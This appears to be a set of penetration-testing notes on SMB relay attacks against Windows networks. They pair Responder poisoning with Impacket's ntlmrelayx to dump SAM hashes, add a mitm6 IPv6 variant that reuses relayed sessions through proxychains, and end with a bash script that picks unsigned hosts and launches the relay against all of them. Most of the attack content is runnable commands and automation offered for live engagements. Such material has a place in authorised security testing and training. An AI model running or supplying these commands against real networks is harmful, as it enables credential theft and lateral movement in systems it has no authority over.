An SMB relay attack takes the NTLM authentication you capture with Responder (the same capture as in LLMNR poisoning) and, instead of cracking the hash offline, forwards it live to another machine: the victim authenticates to you, and you replay that authentication against a target host of your choice. Requirements:
- SMB signing must be disabled (or enabled but not required) on the target. You also cannot relay the authentication back to the machine it came from; it has to go to a different host.
- The relayed user must have administrative rights on the target (local Administrators, Domain Admins, or a group nested into them). Otherwise you only get an unprivileged SMB session and no SAM dump.
- SMB signing lets both sides verify the authenticity and origin of every SMB packet with a key derived from the session, which the relaying attacker never has, so it stops this MITM effectively. It is required by default on domain controllers (and on Windows 11 24H2 / Server 2025 clients), which is why workstations and member servers are the usual targets.
- CrackMapExec and Nmap can scan the whole network for SMB signing, which makes picking targets much easier.
Run this and look for "signing:False" in the results:
crackmapexec smb <ip-address>
- Nmap has a script that reports whether signing is required. Run the following; hosts that print "Message signing enabled but not required" are relay targets:
nmap --script=smb2-security-mode.nse -p 445,139 192.168.64.129 -Pn --open
First, configure Responder: in Responder.conf, change SMB and HTTP to Off so Responder does not answer on those ports itself:
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
We do not want Responder to serve these two protocols: it keeps poisoning LLMNR/NBT-NS so victims connect to us, but the SMB and HTTP connections (and the hashes in them) must land on ntlmrelayx.py from Impacket, which relays them onward. If both tools listen on 445/80 they conflict and the relay never happens. Start Responder in poison-only mode:
sudo python Responder.py -I eth0 -v
Then, in a second terminal, start ntlmrelayx.py pointed at the target (on success it dumps the target's SAM hashes):
sudo python ntlmrelayx.py -t 192.168.1.11 -smb2support
IPv6 variant with mitm6 (takes over DNS for IPv6-enabled Windows clients and pushes them through a WPAD proxy). Run the two tools in separate terminals:
mitm6 -d domain-name.local
ntlmrelayx.py -6 -wh <attacker-ip> -t smb://<target-ip> -socks -debug -smb2support
-6 makes ntlmrelayx listen on IPv6; -wh is the host the served WPAD file points at, so it must be your own machine, not the target; -socks keeps every relayed session open in a SOCKS proxy instead of running a one-shot action. Once ntlmrelayx lists a session with status TRUE, reuse it through proxychains. The password is ignored because the session is already authenticated:
proxychains cme smb <target-ip> -u <User> -p 'whateveryouwant' -d 'domaincorp' --sam 2>/dev/null
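The scan-then-relay workflow above as one script: pick the hosts that do not require signing out of crackmapexec output, switch SMB and HTTP off in Responder.conf, and refuse to launch the relay until that is done. This is an added example written for these notes, not code from Responder, Impacket or CrackMapExec. The scan output and Responder.conf it works on are constructed samples; the IP addresses, host names and the corp.local domain are made up.

```bash
#!/usr/bin/env bash
# SMB relay prep: build a target list from crackmapexec output and turn off
# Responder's SMB/HTTP servers so ntlmrelayx can take those connections.
# Added example for these notes, not Responder/Impacket/CME code. Assumes the
# crackmapexec line format "SMB <ip> 445 <host> [*] ... (signing:False)" and
# a Responder.conf containing "SMB = On" / "HTTP = On" lines.
set -u

# Constructed sample scan output (not a real scan). DC01 requires signing.
CME_SAMPLE='SMB         192.168.64.129  445    WS01   [*] Windows 10 Pro 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.64.130  445    FS01   [*] Windows Server 2019 Standard 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.64.10   445    DC01   [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)'

# Constructed minimal Responder.conf (only the lines that matter here)
RESPONDER_CONF_SAMPLE='[Responder Core]
; Servers to start
SQL = On
SMB = On
HTTP = On
HTTPS = On'

# relay_targets: read crackmapexec output on stdin, print one IP per line for
# hosts that do not require signing. ANSI colour codes are stripped first,
# because CME keeps them even when its output is piped.
relay_targets() {
    esc=$(printf '\033')
    sed "s/${esc}\[[0-9;]*m//g" \
      | awk '$1 == "SMB" && /\(signing:False\)/ { print $2 }'
}

# disable_responder_servers <conf>: set SMB and HTTP to Off in place, keeping
# a .bak copy. HTTPS stays On: the pattern needs " = On" straight after the name.
disable_responder_servers() {
    sed -i.bak -E 's/^(SMB|HTTP) = On$/\1 = Off/' "$1"
}

# responder_ready <conf>: succeeds only when both servers are Off.
responder_ready() {
    grep -qx 'SMB = Off' "$1" && grep -qx 'HTTP = Off' "$1"
}

# run_relay <iface> <conf> <targets-file>: the live sequence. Not run by the demo.
run_relay() {
    iface=$1 conf=$2 targets=$3
    responder_ready "$conf" || { echo "SMB/HTTP still On in $conf, fix it first" >&2; return 1; }
    sudo python3 Responder.py -I "$iface" -v &        # poison only; no SMB/HTTP listeners
    sudo ntlmrelayx.py -tf "$targets" -smb2support     # relay to every host in the list
}

# demo: exercise the helpers on the constructed data, writing targets.txt
demo() {
    conf=$(mktemp)
    printf '%s\n' "$RESPONDER_CONF_SAMPLE" > "$conf"
    disable_responder_servers "$conf"
    responder_ready "$conf" && echo "Responder.conf: SMB and HTTP are Off"
    printf '%s\n' "$CME_SAMPLE" | relay_targets > targets.txt
    echo "relay targets (DC01 excluded because it requires signing):"
    cat targets.txt
    rm -f "$conf" "$conf.bak"
}

case "${1:-}" in demo) demo ;; esac
```

Run it as `bash relay_prep.sh demo` to see the filtering on the sample data; in a real engagement pipe the live scan instead, `crackmapexec smb 192.168.64.0/24 | relay_targets > targets.txt`, then `run_relay eth0 /usr/share/responder/Responder.conf targets.txt`. ntlmrelayx reads the whole list with -tf, so one capture gets tried against every unsigned host rather than the single -t target from the notes above.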